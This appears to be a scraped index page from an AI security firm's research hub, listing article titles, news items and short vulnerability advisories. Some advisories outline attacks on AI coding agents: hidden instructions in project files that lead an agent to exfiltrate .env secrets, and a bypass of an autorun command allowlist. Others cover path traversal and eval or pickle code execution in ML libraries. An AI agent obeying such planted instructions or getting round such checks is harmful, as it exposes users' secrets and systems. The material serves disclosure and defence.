Innovation Hub

Featured Posts

Insights
xx
min read

Model Intelligence

Insights
xx
min read

Introducing Workflow-Aligned Modules in the HiddenLayer AI Security Platform

Insights
xx
min read

Inside HiddenLayer’s Research Team: The Experts Securing the Future of AI

Get all our Latest Research & Insights

Explore our glossary to get clear, practical definitions of the terms shaping AI security, governance, and risk management.

Research

Research
xx
min read

Exploring the Security Risks of AI Assistants like OpenClaw

Research
xx
min read

Agentic ShadowLogic

Research
xx
min read

MCP and the Shift to AI Systems

Research
xx
min read

The Lethal Trifecta and How to Defend Against It

Videos

Report and Guides

Report and Guide
xx
min read

2026 AI Threat Landscape Report

Register today to receive your copy of the report on March 18th and secure your seat for the accompanying webinar on April 8th.

Report and Guide
xx
min read

Securing AI: The Technology Playbook

A practical playbook for securing, governing, and scaling AI applications for Tech companies.

Report and Guide
xx
min read

Securing AI: The Financial Services Playbook

A practical playbook for securing, governing, and scaling AI systems in financial services.

HiddenLayer AI Security Research Advisory

CVE-2026-3071

Flair Vulnerability Report

An arbitrary code execution vulnerability exists in the LanguageModel class due to unsafe deserialization in the load_language_model method. Specifically, the method invokes torch.load() with the weights_only parameter set to False, which causes PyTorch to rely on Python’s pickle module for object deserialization.

CVE-2025-62354

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

When in autorun mode, Cursor checks commands sent to run in the terminal to see if a command has been specifically allowed. The function that checks the command has a bypass to its logic allowing an attacker to craft a command that will execute non-allowed commands.

CVE-2025-62353

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.

SAI-ADV-2025-012

Data Exfiltration from Tool-Assisted Setup

Windsurf’s automated tools can execute instructions contained within project files without asking for user permission. This means an attacker can hide instructions within a project file to read and extract sensitive data from project files (such as a .env file) and insert it into web requests for the purposes of exfiltration.

In the News

News
XX
min read
HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative

Underpinning HiddenLayer’s unique solution for the DoD and USIC is HiddenLayer’s Airgapped AI Security Platform, the first solution designed to protect AI models and development processes in fully classified, disconnected environments. Deployed locally within customer-controlled environments, the platform supports strict US Federal security requirements while delivering enterprise-ready detection, scanning, and response capabilities essential for national security missions.

News
XX
min read
HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments

As organizations rapidly adopt generative AI, they face increasing risks of prompt injection, data leakage, and model misuse. HiddenLayer’s security technology, built on AWS, helps enterprises address these risks while maintaining speed and innovation.

News
XX
min read
HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity

On September 30, Databricks officially launched its <a href="https://www.databricks.com/blog/transforming-cybersecurity-data-intelligence?utm_source=linkedin&amp;utm_medium=organic-social">Data Intelligence Platform for Cybersecurity</a>, marking a significant step in unifying data, AI, and security under one roof. At HiddenLayer, we’re proud to be part of this new data intelligence platform, as it represents a significant milestone in the industry's direction.

Insights
xx
min read

Three Distinct Categories Of AI Red Teaming

As we’ve covered previously, AI red teaming is a highly effective means of assessing and improving the security of AI systems. The term “red teaming” appears many times throughout recent public policy briefings regarding AI.

Insights
xx
min read

Securing Your AI: A Guide for CISOs PT4

As AI continues to evolve at a fast pace, implementing comprehensive security measures is vital for trust and accountability. The integration of AI into essential business operations and society underscores the necessity for proactive security strategies. While challenges and concerns exist, there is significant potential for leaders to make strategic, informed decisions. By pursuing clear, actionable guidance and staying well-informed, organizational leaders can effectively navigate the complexities of security for AI. This proactive stance will help reduce risks, ensure the safe and responsible use of AI technologies, and ultimately promote trust and innovation.

Insights
xx
min read

Securing Your AI with Optiv and HiddenLayer

In today’s rapidly evolving artificial intelligence (AI) landscape, securing AI systems has become paramount. As organizations increasingly rely on AI and machine learning (ML) models, ensuring the integrity and security of these models is critical. To address this growing need, HiddenLayer, a pioneer security for AI company, has a scanning solution that enables companies to secure their AI digital supply chain, mitigating the risk of introducing adversarial code into their environment.

Insights
xx
min read

Securing Your AI: A Step-by-Step Guide for CISOs PT3

With AI advancing rapidly, it's essential to implement thorough security measures. The need for proactive security strategies grows as AI becomes more integrated into critical business functions and society. Despite the challenges and concerns, there is considerable potential for leaders to make strategic, informed decisions. Organizational leaders can navigate the complexities of AI security by seeking clear, actionable guidance and staying well-informed. This proactive approach will help mitigate risks, ensure AI technologies' safe and responsible deployment, and ultimately foster trust and innovation.

Insights
xx
min read

Securing Your AI: A Step-by-Step Guide for CISOs PT2

As AI advances at a rapid pace, implementing comprehensive security measures becomes increasingly crucial. The integration of AI into critical business operations and society is growing, highlighting the importance of proactive security strategies. While there are concerns and challenges surrounding AI, there is also significant potential for leaders to make informed, strategic decisions. Organizational leaders can effectively navigate the complexities of security for AI by seeking clear, actionable guidance and staying informed amidst abundant information. This proactive approach will help mitigate risks and ensure AI technologies' safe and responsible deployment, ultimately fostering trust and innovation.

Insights
xx
min read

Securing Your AI: A Step-by-Step Guide for CISOs

As AI advances at a rapid pace, implementing comprehensive security measures becomes increasingly crucial. The integration of AI into critical business operations and society is growing, highlighting the importance of proactive security strategies. While there are concerns and challenges surrounding AI, there is also significant potential for leaders to make informed, strategic decisions. Organizational leaders can effectively navigate the complexities of AI security by seeking clear, actionable guidance and staying informed amidst the abundance of information. This proactive approach will help mitigate risks and ensure AI technologies' safe and responsible deployment, ultimately fostering trust and innovation.

Insights
xx
min read

A Guide to AI Red Teaming

For decades, the concept of red teaming has been adapted from its military roots to simulate how a threat actor could bypass defenses put in place to secure an organization. For many organizations, employing or contracting with ethical hackers to simulate attacks against their computer systems before adversaries attack is a vital strategy to understand where their weaknesses are. As Artificial Intelligence becomes integrated into everyday life, red-teaming AI systems to find and remediate security vulnerabilities specific to this technology is becoming increasingly important.

Insights
xx
min read

Advancements in Security for AI

To help understand the evolving cybersecurity environment, we developed HiddenLayer’s 2024 AI Threat Landscape Report as a practical guide to understanding the security risks that can affect every industry and to provide actionable steps to implement security measures at your organization.

Insights
xx
min read

AI Model Scanner Accelerates Adoption

OpenAI revolutionized the world by launching ChatGPT, marking a pivotal moment in technology history. The AI arms race, where companies speed to integrate AI amidst the dual pressures of rapid innovation and cybersecurity challenges, highlights the inherent risks in AI models. HiddenLayer’s Model Scanner is crucial for identifying and mitigating these vulnerabilities. From the surge of third-party models on platforms like Hugging Face to the Wild West-like rush for AI dominance, this article offers insights into securing AI’s future while enabling businesses to harness its transformative power safely.

Insights
xx
min read

Introducing the Security for AI Council

It’s been just a few short weeks since RSAC 2024, an event that left a lasting impression on all who attended. This year, the theme “The Art of the Possible” resonated deeply, showcasing the industry’s commitment to exploring new horizons and embracing innovative ideas. It was inspiring to witness the collective enthusiasm for Possibility Thinking, a cognitive perspective that focuses on exploring potential opportunities and imagining various scenarios without being constrained by current realities or limitations. It involves a mindset open to new ideas, creative solutions, and innovative thinking. The theme and general ambiance set the stage perfectly for us to launch something big, the Security for AI Council.

Insights
xx
min read

From National Security to Building Trust: The Current State of Securing AI

Consider this sobering statistic: 77% of organizations have been breached through their AI systems in the past year. With organizations deploying thousands of AI models, the critical role of these systems is undeniable. Yet, the security of these models is often an afterthought, brought into the limelight only in the aftermath of a breach, with the security team shouldering the blame.

Insights
xx
min read

Understanding the Threat Landscape for AI-Based Systems

To help understand the evolving cybersecurity environment, we developed HiddenLayer’s 2024 AI Threat Landscape Report as a practical guide to understanding the security risks that can affect every industry and to provide actionable steps to implement security measures at your organization.

Webinars

Offensive and Defensive Security for Agentic AI

Webinars

How to Build Secure Agents

Webinars

Beating the AI Game, Ripple, Numerology, Darcula, Special Guests from Hidden Layer… – Malcolm Harkins, Kasimir Schulz – SWN #471

Webinars

HiddenLayer Webinar: 2024 AI Threat Landscape Report

Webinars

HiddenLayer Model Scanner

Webinars

HiddenLayer Webinar: A Guide to AI Red Teaming

Webinars

HiddenLayer Webinar: Accelerating Your Customer's AI Adoption

Webinars

HiddenLayer: AI Detection Response for GenAI

Webinars

HiddenLayer Webinar: Women Leading Cyber

research
xx
min read

Exploring the Security Risks of AI Assistants like OpenClaw

research
xx
min read

Agentic ShadowLogic

research
xx
min read

MCP and the Shift to AI Systems

research
xx
min read

The Lethal Trifecta and How to Defend Against It

research
xx
min read

EchoGram: The Hidden Vulnerability Undermining AI Guardrails

research
xx
min read

Same Model, Different Hat

research
xx
min read

The Expanding AI Cyber Risk Landscape

research
xx
min read

The First AI-Powered Cyber Attack

research
xx
min read

Prompts Gone Viral: Practical Code Assistant AI Viruses

research
xx
min read

Persistent Backdoors

research
xx
min read

Visual Input based Steering for Output Redirection (VISOR)

research
xx
min read

How Hidden Prompt Injections Can Hijack AI Code Assistants Like Cursor

Report and Guide
xx
min read

2026 AI Threat Landscape Report

Report and Guide
xx
min read

Securing AI: The Technology Playbook

Report and Guide
xx
min read

Securing AI: The Financial Services Playbook

Report and Guide
xx
min read

AI Threat Landscape Report 2025

Report and Guide
xx
min read

HiddenLayer Named a Cool Vendor in AI Security

Report and Guide
xx
min read

A Step-By-Step Guide for CISOS

Report and Guide
xx
min read

AI Threat landscape Report 2024

Report and Guide
xx
min read

HiddenLayer and Intel eBook

Report and Guide
xx
min read

Forrester Opportunity Snapshot

Report and Guide
xx
min read

Gartner® Report: 3 Steps to Operationalize an Agentic AI Code of Conduct for Healthcare CIOs

news
xx
min read

HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative

news
xx
min read

HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments

news
xx
min read

HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity

news
xx
min read

HiddenLayer Appoints Chelsea Strong as Chief Revenue Officer to Accelerate Global Growth and Customer Expansion

news
xx
min read

HiddenLayer Listed in AWS “ICMP” for the US Federal Government

news
xx
min read

New TokenBreak Attack Bypasses AI Moderation with Single-Character Text Changes

news
xx
min read

Beating the AI Game, Ripple, Numerology, Darcula, Special Guests from Hidden Layer… – Malcolm Harkins, Kasimir Schulz – SWN #471

news
xx
min read

All Major Gen-AI Models Vulnerable to ‘Policy Puppetry’ Prompt Injection Attack

news
xx
min read

One Prompt Can Bypass Every Major LLM’s Safeguards

news
xx
min read

Cyera and HiddenLayer Announce Strategic Partnership to Deliver End-to-End AI Security

news
xx
min read

HiddenLayer Unveils AISec Platform 2.0 to Deliver Unmatched Context, Visibility, and Observability for Enterprise AI Security

news
xx
min read

HiddenLayer AI Threat Landscape Report Reveals AI Breaches on the Rise;

SAI Security Advisory

Eval on query parameters allows arbitrary code execution in SharePoint integration list creation

An attacker authenticated to a MindsDB instance with the SharePoint integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the SharePoint engine and running an ‘INSERT’ query against it to create a list, where the value given for the ‘list’ parameter would contain the code to be executed. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run the arbitrary code contained within the query.

SAI Security Advisory

Eval on query parameters allows arbitrary code execution in ChromaDB integration

An attacker authenticated to a MindsDB instance with the ChromaDB integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the ChromaDB engine and running an ‘INSERT’ query against it, where the value given for ‘metadata’ would contain the code to be executed. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run the arbitrary code contained within the query.

SAI Security Advisory

Eval on query parameters allows arbitrary code execution in Vector Database integrations

An attacker authenticated to a MindsDB instance with any one of several integrations installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the specified integration engine and running an ‘UPDATE’ query against it, containing the code to execute. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run any arbitrary Python code contained within the value given in the ‘SET embeddings =’ part of the query.

SAI Security Advisory

Eval on query parameters allows arbitrary code execution in Weaviate integration

An attacker authenticated to a MindsDB instance with the Weaviate integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the Weaviate engine and running a ‘SELECT WHERE’ clause against it, containing the code to execute. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input, but it will run any arbitrary Python code contained within the value given in the ‘WHERE embeddings =’ part of the clause.

SAI Security Advisory

Unsafe deserialization in Datalab leads to arbitrary code execution

An attacker can place a malicious file called datalabs.pkl within a directory and send that directory to a victim user. When the victim user loads the directory with Datalabs.load, the datalabs.pkl within it is deserialized and any arbitrary code contained within it is executed.

SAI Security Advisory

Eval on CSV data allows arbitrary code execution in the MLCTaskValidate class

An attacker can craft a CSV file containing Python code in one of the values. This code must be wrapped in brackets to work i.e. []. The maliciously crafted CSV file can then be shared with a victim user as a dataset. When the user creates a multilabel classification task, the CSV is loaded and passed through a validation function, where values wrapped in brackets are passed into an eval function, which will execute the Python code contained within.

SAI Security Advisory

Eval on CSV data allows arbitrary code execution in the ClassificationTaskValidate class

An attacker can craft a CSV file containing Python code in one of the values. This code must be wrapped in brackets to work i.e. []. The maliciously crafted CSV file can then be shared with a victim user as a dataset. When the user creates a classification task, the CSV is loaded and passed through a validation function, where values wrapped in brackets are passed into an eval function, which will execute the Python code contained within.

SAI Security Advisory

Safe_eval and safe_exec allows for arbitrary code execution

Execution of arbitrary code can be achieved via the safe_eval and safe_exec functions of the llama-index-experimental/llama_index/experimental/exec_utils.py Python file. The functions allow the user to run untrusted code via an eval or exec function while only permitting whitelisted functions. However, an attacker can leverage the whitelisted pandas.read_pickle function or other 3rd party library functions to achieve arbitrary code execution. This can be exploited in the Pandas Query Engine.

SAI Security Advisory

Exec on untrusted LLM output leading to arbitrary code execution on Evaporate integration

The safe_eval and safe_exec functions are intended to allow the user to run untrusted code in an eval or exec function while disallowing dangerous functions. However, an attacker can use 3rd party library functions to get arbitrary code execution.

SAI Security Advisory

Crafted WiFI network name (SSID) leads to arbitrary command injection

A command injection vulnerability exists in Wyze Cam V4 firmware versions up to and including 4.52.4.9887. An attacker within Bluetooth range of the camera can leverage this command to execute arbitrary commands as root during the camera setup process.

SAI Security Advisory

Deserialization of untrusted data leading to arbitrary code execution

Execution of arbitrary code can be achieved through the deserialization process in the tensorflow_probability/python/layers/distribution_layer.py file within the function _deserialize_function. An attacker can inject a malicious pickle object into an HDF5 formatted model file, which will be deserialized via pickle when the model is loaded, executing the malicious code on the victim machine. An attacker can achieve this by injecting a pickle object into the DistributionLambda layer of the model under the make_distribution_fn key.

SAI Security Advisory

Pickle Load on Sklearn Model Load Leading to Code Execution Copy

An attacker can inject a malicious pickle object into a scikit-learn model file and log it to the MLflow tracking server via the API. When a victim user calls the mlflow.sklearn.load_model function on the model, the pickle file is deserialized on their system, running any arbitrary code it contains.

Stay Ahead of AI Security Risks

Get research-driven insights, emerging threat analysis, and practical guidance on securing AI systems—delivered to your inbox.

By submitting this form, you agree to HiddenLayer's Terms of Use and acknowledge our Privacy Statement.

Thanks for your message!

We will reach back to you as soon as possible.

Oops! Something went wrong while submitting the form.